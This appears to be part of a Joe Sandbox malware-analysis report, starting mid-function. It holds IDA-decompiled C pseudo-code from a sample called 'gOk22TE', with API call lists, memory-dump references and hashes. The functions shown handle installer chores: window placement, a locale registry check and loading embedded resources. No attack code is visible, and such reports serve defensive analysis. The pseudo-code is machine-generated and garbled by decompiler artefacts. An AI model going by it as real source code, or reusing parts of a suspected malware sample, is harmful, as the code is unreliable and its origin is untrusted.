                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                									_t52 = _t65;
                                                                                                                                                                                                                                                									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                                									_t60 = _t14;
                                                                                                                                                                                                                                                									do {
                                                                                                                                                                                                                                                										_t32 =  *_t52;
                                                                                                                                                                                                                                                										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                                									} while (_t32 != 0);
                                                                                                                                                                                                                                                									goto L17;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								E010E65E8( &_v268);
                                                                                                                                                                                                                                                								_t55 =  &_v268;
                                                                                                                                                                                                                                                								_t62 = _t55 + 1;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t34 =  *_t55;
                                                                                                                                                                                                                                                									_t55 = _t55 + 1;
                                                                                                                                                                                                                                                								} while (_t34 != 0);
                                                                                                                                                                                                                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                                									 *_t38 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								E010E1680(_t65, E010E17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                								_t59 = _t65;
                                                                                                                                                                                                                                                								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                                								_t60 = _t12;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t42 =  *_t59;
                                                                                                                                                                                                                                                									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                                								} while (_t42 != 0);
                                                                                                                                                                                                                                                								L17:
                                                                                                                                                                                                                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *_t65 = _t17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                                			}






















                                                                                                                                                                                                                                                0x010e2b26
                                                                                                                                                                                                                                                0x010e2b99
                                                                                                                                                                                                                                                0x010e2bc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2b9b
                                                                                                                                                                                                                                                0x010e2bae
                                                                                                                                                                                                                                                0x010e2bb3
                                                                                                                                                                                                                                                0x010e2bb5
                                                                                                                                                                                                                                                0x010e2bb5
                                                                                                                                                                                                                                                0x010e2bb8
                                                                                                                                                                                                                                                0x010e2bb8
                                                                                                                                                                                                                                                0x010e2bba
                                                                                                                                                                                                                                                0x010e2bbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2bb8
                                                                                                                                                                                                                                                0x010e2b28
                                                                                                                                                                                                                                                0x010e2b2e
                                                                                                                                                                                                                                                0x010e2b33
                                                                                                                                                                                                                                                0x010e2b39
                                                                                                                                                                                                                                                0x010e2b3c
                                                                                                                                                                                                                                                0x010e2b3c
                                                                                                                                                                                                                                                0x010e2b3e
                                                                                                                                                                                                                                                0x010e2b3f
                                                                                                                                                                                                                                                0x010e2b55
                                                                                                                                                                                                                                                0x010e2b5d
                                                                                                                                                                                                                                                0x010e2b64
                                                                                                                                                                                                                                                0x010e2b64
                                                                                                                                                                                                                                                0x010e2b7a
                                                                                                                                                                                                                                                0x010e2b7f
                                                                                                                                                                                                                                                0x010e2b81
                                                                                                                                                                                                                                                0x010e2b81
                                                                                                                                                                                                                                                0x010e2b84
                                                                                                                                                                                                                                                0x010e2b84
                                                                                                                                                                                                                                                0x010e2b86
                                                                                                                                                                                                                                                0x010e2b87
                                                                                                                                                                                                                                                0x010e2bbf
                                                                                                                                                                                                                                                0x010e2bc1
                                                                                                                                                                                                                                                0x010e2bc1
                                                                                                                                                                                                                                                0x010e2b26
                                                                                                                                                                                                                                                0x010e2bda
                                                                                                                                                                                                                                                0x010e2bda
                                                                                                                                                                                                                                                0x010e2be6
                                                                                                                                                                                                                                                0x010e2be6
                                                                                                                                                                                                                                                0x010e2bf8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010E2AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 010E2AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 010E2B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 010E2B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 010E2B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 010E2BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                                                                                                                                                                                                                                                • Instruction ID: 2f965684977c52619089d0fd4a2bd4a22441e97f96c73496c354bb14075210b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa29d2d9df99b0b41dabfe9086007ceda3444729974de75fbe9adb075061029f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87412A346042459FDF669F399858AFE7FED9F56710F0440DAD8C287202DB7A8A86CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E010E43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				struct tagRECT _v24;
                                                                                                                                                                                                                                                				struct tagRECT _v40;
                                                                                                                                                                                                                                                				struct HWND__* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				int _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				int _v60;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				struct HWND__* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t67;
                                                                                                                                                                                                                                                				struct HWND__* _t68;
                                                                                                                                                                                                                                                				struct HDC__* _t69;
                                                                                                                                                                                                                                                				int _t72;
                                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t63 = __edx;
                                                                                                                                                                                                                                                				_t29 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                                				_t68 = __edx;
                                                                                                                                                                                                                                                				_v44 = __ecx;
                                                                                                                                                                                                                                                				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                                				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                                				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                                				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                                				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                                				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                                				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                                				_t56 = _v48;
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                                				_t67 = 0;
                                                                                                                                                                                                                                                				if(_t72 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v52;
                                                                                                                                                                                                                                                					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                                						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t72 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                                				if(_t59 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v60;
                                                                                                                                                                                                                                                					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                                						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t59 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 010E43F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 010E440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 010E4423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 010E442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010E443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 010E4447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010E44A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                                                                                                                                                                                                                                                • Instruction ID: ecde2537c1f88f6fa82452bbc0cac5a42fa33f7532612b1cf4cf0980da97df34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18313872F00119AFCB24CEB9D9889EEBBF5EB89310F154169F845F7244DA35AD058B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E010E6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				struct HRSRC__* _t21;
                                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                                                                				_v32 = __ecx;
                                                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                                                				_t36 = 1;
                                                                                                                                                                                                                                                				E010E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                                					if(_t21 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                                					if(_t45 == 0) {
                                                                                                                                                                                                                                                						 *0x10e9124 = 0x80070714;
                                                                                                                                                                                                                                                						_t36 = _t46;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                                						_t44 = _t5;
                                                                                                                                                                                                                                                						_t40 = _t44;
                                                                                                                                                                                                                                                						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                                						_t47 = _t6;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t26 =  *_t40;
                                                                                                                                                                                                                                                							_t40 = _t40 + 1;
                                                                                                                                                                                                                                                						} while (_t26 != 0);
                                                                                                                                                                                                                                                						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                                						_t46 = _t51;
                                                                                                                                                                                                                                                						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                                						 *0x10ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                                						_t30 = _v32();
                                                                                                                                                                                                                                                						if(_t51 != _t51) {
                                                                                                                                                                                                                                                							asm("int 0x29");
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(_t45);
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							_t36 = 0;
                                                                                                                                                                                                                                                							FreeResource(??);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							FreeResource();
                                                                                                                                                                                                                                                							_v36 = _v36 + 1;
                                                                                                                                                                                                                                                							E010E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                                							_t46 = 0;
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					return E010E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010E6345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E6357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                                                                                                                                                                                                                                                • Instruction ID: fa70b6d9081c06f71061de806adb5c9ced505f12710a3fc29d87007f8aec0191
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C21D875B00219AFDB209F66EC499FE7BF8FB48B54F004159F982A7201D73B99018BE0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E681F(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                                				void* _v172;
                                                                                                                                                                                                                                                				int* _v176;
                                                                                                                                                                                                                                                				int _v180;
                                                                                                                                                                                                                                                				int _v184;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t36 = __ebx;
                                                                                                                                                                                                                                                				_t19 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                                				_t41 =  *0x10e81d8; // 0xfffffffe
                                                                                                                                                                                                                                                				_t43 = 0;
                                                                                                                                                                                                                                                				_v180 = 0xc;
                                                                                                                                                                                                                                                				_v176 = 0;
                                                                                                                                                                                                                                                				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                                					 *0x10e81d8 = 0;
                                                                                                                                                                                                                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                						_t41 =  *0x10e81d8; // 0xfffffffe
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t41 = 1;
                                                                                                                                                                                                                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t31 = RegQueryValueExA(_v172, 0x10e1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                                							_t43 = _t31;
                                                                                                                                                                                                                                                							RegCloseKey(_v172);
                                                                                                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t40 =  &_v176;
                                                                                                                                                                                                                                                								if(E010E66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                                										 *0x10e81d8 = _t41;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L12;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 010E6902
                                                                                                                                                                                                                                                  • Part of subcall function 010E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010E691A), ref: 010E6741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 010E68C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                                                                                                                                                                                                                                                • Instruction ID: 1aafdf3dd6fe0cc0fc6f56041b3108577f3b046d595df7e97bad8652fd736277
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59318231A40218DFDB31CB17EC48BEA7BFCEB55764F0041D5E989AA240D73699858F51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E3A3F(void* __eflags) {
                                                                                                                                                                                                                                                				void* _t3;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				CHAR* _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = "LICENSE";
                                                                                                                                                                                                                                                				_t1 = E010E468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				 *0x10e8d4c = _t3;
                                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                                					_t19 = _t16;
                                                                                                                                                                                                                                                					if(E010E468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA( *0x10e8d4c, "<None>") == 0) {
                                                                                                                                                                                                                                                							LocalFree( *0x10e8d4c);
                                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                                							 *0x10e9124 = 0;
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t9 = E010E6517(_t19, 0x7d1, 0, E010E3100, 0, 0);
                                                                                                                                                                                                                                                						LocalFree( *0x10e8d4c);
                                                                                                                                                                                                                                                						if(_t9 != 0) {
                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x10e9124 = 0x800704c7;
                                                                                                                                                                                                                                                						L2:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree( *0x10e8d4c);
                                                                                                                                                                                                                                                					 *0x10e9124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L2;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F64,?,00000002,00000000), ref: 010E3A5D
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010E3AB3
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(<None>,00000000), ref: 010E3AD0
